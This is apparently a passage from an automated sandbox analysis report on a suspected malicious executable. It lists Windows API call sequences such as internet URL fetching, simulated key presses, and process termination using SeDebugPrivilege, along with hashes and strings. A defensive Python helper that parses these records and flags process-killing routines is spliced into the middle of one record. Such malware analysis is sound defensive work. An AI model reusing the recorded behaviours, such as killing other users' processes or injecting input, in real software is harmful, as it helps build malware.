                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3113390036-3916222277
                                                                                                            • Opcode ID: 71e63d03290dc009d799f004605fd17172a3db87c2777fd6e7e84eb22035c4a7
                                                                                                            • Instruction ID: 1381f4fc9e6156122ee47723e8b8e9740ffd142171feb496c9496784ef4e6b4a
                                                                                                            • Opcode Fuzzy Hash: 71e63d03290dc009d799f004605fd17172a3db87c2777fd6e7e84eb22035c4a7
                                                                                                            • Instruction Fuzzy Hash: 62319CB1520749AFD721AF649888FAB7AFCEB49740B08951EF58AD7210DB30DD058B70
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00D93AAF,?,?,Bad directive syntax error,00DECC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00DB98BC
                                                                                                            • LoadStringW.USER32(00000000,?,00D93AAF,?), ref: 00DB98C3
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00DB9987
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                            • API String ID: 858772685-4153970271
                                                                                                            • Opcode ID: 887f0ba40892ae3baff2bd2c66715246db6f0d51b576d30546efd3d4d216ed85
                                                                                                            • Instruction ID: 091f38bff71a78849a6fd891298b4ba4d7cbd9b53a3efeffc9b307d48c57b905
                                                                                                            • Opcode Fuzzy Hash: 887f0ba40892ae3baff2bd2c66715246db6f0d51b576d30546efd3d4d216ed85
                                                                                                            • Instruction Fuzzy Hash: D0216B3290035EEBDF11AF90CC56EEEB735FF18301F045469FA25660A2EA719A58CB30
APIs
• GetParent.USER32 ref: 00DB20AB
• GetClassNameW.USER32(00000000,?,00000100), ref: 00DB20C0
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00DB214D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1290815626-3381328864
• Opcode ID: 372c70d9c82d1cccfc532f190961328d7f2ad0b72e0b92c7e2180668af90f192
• Instruction ID: 7db796edf2df819a5b1da6a5896062f49d79c4e0b3ea3580921e49f4c7d51e8d
• Opcode Fuzzy Hash: 372c70d9c82d1cccfc532f190961328d7f2ad0b72e0b92c7e2180668af90f192
• Instruction Fuzzy Hash: 141106776C8706F9F6112224DC07DF7379CCB44764B20501AFB0AF90E5FA65A8425A34
APIs
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: _free$EnvironmentVariable___from_strstr_to_strchr
• String ID:
• API String ID: 1282221369-0
• Opcode ID: 8ae382b96fe58076ef0f599cbb58c1a63ab659a186c873b9ac7b93ae3523ff34
• Instruction ID: 3b3b821d08689da1b2b76fb4aed18d1e337cb9ba9b012c154371b94468b091b7
• Opcode Fuzzy Hash: 8ae382b96fe58076ef0f599cbb58c1a63ab659a186c873b9ac7b93ae3523ff34
• Instruction Fuzzy Hash: 33610671906305EFEB31BFB59881A797BAAEF05310F19416EFA44A72C2D73599028B70
APIs
• SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00DE5186
• ShowWindow.USER32(?,00000000), ref: 00DE51C7
• ShowWindow.USER32(?,00000005,?,00000000), ref: 00DE51CD
• SetFocus.USER32(?,?,00000005,?,00000000), ref: 00DE51D1
  • Part of subcall function 00DE6FBA: DeleteObject.GDI32(00000000), ref: 00DE6FE6
• GetWindowLongW.USER32(?,000000F0), ref: 00DE520D
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DE521A
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00DE524D
• SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00DE5287
• SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00DE5296
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
• String ID:
• API String ID: 3210457359-0
• Opcode ID: d91bbbc2895062b69f80e8b43e3b261e8fe7348a9267687d822b869904ab1854
• Instruction ID: 37e568a9aa3f5b548a0315a29d235cb88a211a17f5e75e151ed5ce3c4f40cb26
• Opcode Fuzzy Hash: d91bbbc2895062b69f80e8b43e3b261e8fe7348a9267687d822b869904ab1854
• Instruction Fuzzy Hash: 7B51C530A50B88BFEF20BF26EC45BD93B65FB053A9F184011F6199A2E5C3719980DB71
APIs
• LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00DA6890
• ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00DA68A9
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DA68B9
• ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00DA68D1
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DA68F2
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D68874,00000000,00000000,00000000,000000FF,00000000), ref: 00DA6901
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DA691E
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D68874,00000000,00000000,00000000,000000FF,00000000), ref: 00DA692D
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend
• String ID:
• API String ID: 1268354404-0
• Opcode ID: eb6f2d5263e77fd217c9a3156b5aa1cecad3dfb8a36cfd2f8ae7c7e9eb3598f5
• Instruction ID: 29a02c88fca5da0436271ae2411579a3ceda566149e1b7d669506f5e1a359919
• Opcode Fuzzy Hash: eb6f2d5263e77fd217c9a3156b5aa1cecad3dfb8a36cfd2f8ae7c7e9eb3598f5
• Instruction Fuzzy Hash: 9D519B70600309EFDB20DF29CC95FAA77B5EB58750F184618F956E72A0DB70E981EB60
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DCC182
• GetLastError.KERNEL32 ref: 00DCC195
• SetEvent.KERNEL32(?), ref: 00DCC1A9
  • Part of subcall function 00DCC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DCC272
  • Part of subcall function 00DCC253: GetLastError.KERNEL32 ref: 00DCC322
  • Part of subcall function 00DCC253: SetEvent.KERNEL32(?), ref: 00DCC336
  • Part of subcall function 00DCC253: InternetCloseHandle.WININET(00000000), ref: 00DCC341
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
• String ID:
• API String ID: 337547030-0
• Opcode ID: f87aef223646ca3f66619227064aac3913648abdbafd32902cbc68b062fc3215
• Instruction ID: 83e04053a39b0b0d4a14b667127e80fe7a7db406c62b1d6a0194c2989d53b910
• Opcode Fuzzy Hash: f87aef223646ca3f66619227064aac3913648abdbafd32902cbc68b062fc3215
• Instruction Fuzzy Hash: B5318971620742AFDB21AFA59C44F66BBE9FF18300B08641DFA5ACB610D730E8119BB0
APIs
  • Part of subcall function 00DB3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB3A57
  • Part of subcall function 00DB3A3D: GetCurrentThreadId.KERNEL32 ref: 00DB3A5E
  • Part of subcall function 00DB3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DB25B3), ref: 00DB3A65
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00DB25BD
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00DB25DB
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00DB25DF
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00DB25E9
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00DB2601
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00DB2605
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00DB260F
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00DB2623
• Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00DB2627
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
• Opcode ID: 7c42c2581fa0f2d326fa80c188e1976dbc0375feb821106c3f32348f6f59366f
• Instruction ID: 8cd968a8ffe35e360e955a97c6b0ee0b8d798da51f9d4bed2b6ad9421039a9c9
• Opcode Fuzzy Hash: 7c42c2581fa0f2d326fa80c188e1976dbc0375feb821106c3f32348f6f59366f
• Instruction Fuzzy Hash: B90124313A0350BBFB2077688CCAF9A3F59DB5EB12F101001F318EE1E1C9E264458A79
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00DB1449,?,?,00000000), ref: 00DB180C
• HeapAlloc.KERNEL32(00000000,?,00DB1449,?,?,00000000), ref: 00DB1813
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DB1449,?,?,00000000), ref: 00DB1828
• GetCurrentProcess.KERNEL32(?,00000000,?,00DB1449,?,?,00000000), ref: 00DB1830
• DuplicateHandle.KERNEL32(00000000,?,00DB1449,?,?,00000000), ref: 00DB1833
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DB1449,?,?,00000000), ref: 00DB1843
• GetCurrentProcess.KERNEL32(00DB1449,00000000,?,00DB1449,?,?,00000000), ref: 00DB184B
• DuplicateHandle.KERNEL32(00000000,?,00DB1449,?,?,00000000), ref: 00DB184E
• CreateThread.KERNEL32(00000000,00000000,00DB1874,00000000,00000000,00000000), ref: 00DB1868
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: b8ddc84a8075fe8c937f1eb5ad071634bf86a0179b32059fa116219516a167b8
• Instruction ID: 3760fb401c22eb0ecf4b72443a2f70efbe500a214e995064efe50c1a50e7d2fc
• Opcode Fuzzy Hash: b8ddc84a8075fe8c937f1eb5ad071634bf86a0179b32059fa116219516a167b8
• Instruction Fuzzy Hash: 4801BBB5250348BFE710ABA5DC8DF6B3BACEB89B11F405411FA05DF2A1CA709801CB30
APIs
  • Part of subcall function 00DBD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00DBD501
  • Part of subcall function 00DBD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00DBD50F
  • Part of subcall function 00DBD4DC: CloseHandle.KERNEL32(00000000), ref: 00DBD5DC
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DDA16D
• GetLastError.KERNEL32 ref: 00DDA180
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DDA1B3
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00DDA268
• GetLastError.KERNEL32(00000000), ref: 00DDA273
• CloseHandle.KERNEL32(00000000), ref: 00DDA2C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                            • String ID: SeDebugPrivilege
                                                                                                            • API String ID: 2533919879-2896544425
                                                                                                            • Opcode ID: d2d057c254288d3d366fbc62cd2f02fe58317bd2263bb8d436c6ecd3d90f77d7
                                                                                                            • Instruction ID: b65b620e6011d131219a4b26c977031c5a8f2ec67cdc0e3bbff8eefeeb3aefcd
                                                                                                            • Opcode Fuzzy Hash: d2d057c254288d3d366fbc62cd2f02fe58317bd2263bb8d436c6ecd3d90f77d7
                                                                                                            • Instruction Fuzzy Hash: 8D618C302093429FD710DF19C894F16BBE1AF44318F58C49DE8668B7A2C772ED49CBA2
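The function card above (CreateToolhelp32Snapshot / Process32FirstW in a subcall, then OpenProcess with access 00000001 and TerminateProcess, with the string SeDebugPrivilege) is the one record in this section a triager actually wants to pull out of the report. The helper below is an added example, not Joe Sandbox code or anything shipped with the sample: it parses function cards in the layout used on this page (the `•` API lines with their `ref:` offsets, and the key/value lines under `Similarity`) and flags routines that enumerate processes and call TerminateProcess. The sample text is constructed from the records on this page; the constant `PROCESS_TERMINATE` (0x0001) is the documented dwDesiredAccess bit matching the first OpenProcess argument 00000001; the function names `parse_records`, `flag_process_kill` and `triage` are my own.

```python
"""Added triage helper (not Joe Sandbox code): parse the per-function
"APIs" / "Similarity" cards above and flag enumerate-and-terminate routines."""
import re

PROCESS_TERMINATE = 0x0001  # dwDesiredAccess bit in the first OpenProcess argument

API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)$")
KV_LINE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
KV_SECTIONS = {"Similarity", "Memory Dump Source"}

# Constructed sample: the termination routine from the report plus one GUI routine.
SAMPLE = """\
APIs
  • Part of subcall function 00DBD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00DBD501
  • Part of subcall function 00DBD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00DBD50F
  • Part of subcall function 00DBD4DC: CloseHandle.KERNEL32(00000000), ref: 00DBD5DC
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DDA16D
• GetLastError.KERNEL32 ref: 00DDA180
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DDA1B3
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00DDA268
• GetLastError.KERNEL32(00000000), ref: 00DDA273
• CloseHandle.KERNEL32(00000000), ref: 00DDA2C4
Strings
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• Opcode ID: d2d057c254288d3d366fbc62cd2f02fe58317bd2263bb8d436c6ecd3d90f77d7
• Instruction Fuzzy Hash: 8D618C302093429FD710DF19C894F16BBE1AF44318F58C49DE8668B7A2C772ED49CBA2
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DE3925
• _wcslen.LIBCMT ref: 00DE3999
Strings
Similarity
• API ID: MessageSend$Window_wcslen
• String ID: SysListView32
• Opcode ID: 7b77353fb49686e20043736a69ee1a6c15d0d6c1abd88e3cafc6d8a0951aef1e
"""

def parse_records(text):
    """Split report text into records; each 'APIs' header starts a new function card."""
    records, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            section = line
            if line == "APIs":
                records.append({"apis": [], "meta": {}})
            continue
        if not records or not line.startswith("•"):
            continue
        if section == "APIs" and (m := API_LINE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            records[-1]["apis"].append({"name": m["name"], "module": m["mod"],
                                        "args": args, "ref": m["ref"], "subcall": m["sub"]})
        elif section in KV_SECTIONS and (m := KV_LINE.match(line)):
            records[-1]["meta"][m["key"].strip()] = m["val"].strip()
    return records

def arg_int(arg):
    """Hex argument column -> int; '?' (not resolved by the analysis) -> None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None

def flag_process_kill(rec):
    """Reasons a record looks like an enumerate-and-kill routine; [] when TerminateProcess is absent."""
    names = {a["name"] for a in rec["apis"]}
    if "TerminateProcess" not in names:
        return []
    reasons = ["calls TerminateProcess"]
    if "CreateToolhelp32Snapshot" in names and names & {"Process32FirstW", "Process32NextW"}:
        reasons.append("walks the process list via CreateToolhelp32Snapshot/Process32FirstW")
    for a in rec["apis"]:
        access = arg_int(a["args"][0]) if a["name"] == "OpenProcess" and a["args"] else None
        if access is not None and access & PROCESS_TERMINATE:
            reasons.append(f"OpenProcess with PROCESS_TERMINATE at {a['ref']}")
            break
    if "SeDebugPrivilege" in rec["meta"].get("String ID", ""):
        reasons.append("references SeDebugPrivilege (needed to open processes of other users)")
    return reasons

def triage(text):
    """Opcode ID -> reasons for every flagged record; Opcode ID is the pivot to the same code elsewhere."""
    hits = {}
    for rec in parse_records(text):
        reasons = flag_process_kill(rec)
        if reasons:
            hits[rec["meta"].get("Opcode ID", "?")] = reasons
    return hits

if __name__ == "__main__":
    for opcode_id, reasons in triage(SAMPLE).items():
        print(opcode_id[:16], *reasons, sep="\n  ")
```

The Opcode ID is the useful pivot: the same value in another report means the same compiled routine, and the chain here (snapshot, OpenProcess(PROCESS_TERMINATE), TerminateProcess, SeDebugPrivilege) is consistent with the report's note that the binary is likely a compiled AutoIt script, whose runtime carries such a process-close routine; the privilege string is what lets it kill processes it does not own. The OpenProcess access mask is checked as a bit, not by equality, so a routine requesting PROCESS_TERMINATE alongside other rights is still flagged.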
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DE3925
                                                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00DE393A
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DE3954
                                                                                                            • _wcslen.LIBCMT ref: 00DE3999
                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00DE39C6
                                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DE39F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window_wcslen
                                                                                                            • String ID: SysListView32
                                                                                                            • API String ID: 2147712094-78025650
                                                                                                            • Opcode ID: 7b77353fb49686e20043736a69ee1a6c15d0d6c1abd88e3cafc6d8a0951aef1e
                                                                                                            • Instruction ID: c3a85fe8f90be1d95c1dd3464c728e6d05af6906c61d94922f81eac1f9da8c09
                                                                                                            • Opcode Fuzzy Hash: 7b77353fb49686e20043736a69ee1a6c15d0d6c1abd88e3cafc6d8a0951aef1e
                                                                                                            • Instruction Fuzzy Hash: 3641C671A00358ABDF21AF65CC89BFA77A9EF08350F140126F958E7291D771DA80CBB0
                                                                                                            APIs
                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DBBCFD
                                                                                                            • IsMenu.USER32(00000000), ref: 00DBBD1D
                                                                                                            • CreatePopupMenu.USER32 ref: 00DBBD53
                                                                                                            • GetMenuItemCount.USER32(013E57E8), ref: 00DBBDA4
                                                                                                            • InsertMenuItemW.USER32(013E57E8,?,00000001,00000030), ref: 00DBBDCC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                            • String ID: 0$2
                                                                                                            • API String ID: 93392585-3793063076
                                                                                                            • Opcode ID: 02ee67f2b1c052608a53267f49599fa053edf2068e44ba55eae1f4e2dc0147c4
                                                                                                            • Instruction ID: cd1d7eb5582d681c2c6f1b2fe9f07fb8508ee71530e1a9d218750051a1acf322
                                                                                                            • Opcode Fuzzy Hash: 02ee67f2b1c052608a53267f49599fa053edf2068e44ba55eae1f4e2dc0147c4
                                                                                                            • Instruction Fuzzy Hash: EE517970A00205DBDB20DFA8D884BEEBBF4EF45324F18421AE4539B290E7B89941CB71
                                                                                                            APIs
                                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 00DBC913
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: IconLoad
                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                            • API String ID: 2457776203-404129466
                                                                                                            • Opcode ID: 6c5923211379623a83ffdd671ba8d7cb009fee6e59ccab685f517b5188aa07c8
                                                                                                            • Instruction ID: 9e52665612114ae79edce44d11745a303e8dcb42909ea8c749ba11597e871374
                                                                                                            • Opcode Fuzzy Hash: 6c5923211379623a83ffdd671ba8d7cb009fee6e59ccab685f517b5188aa07c8
                                                                                                            • Instruction Fuzzy Hash: 03112B35699306FBFB015B149C82CEA279CEF15319B60602BF505E62C2E7609D405674
                                                                                                            APIs
                                                                                                            Memory Dump Source
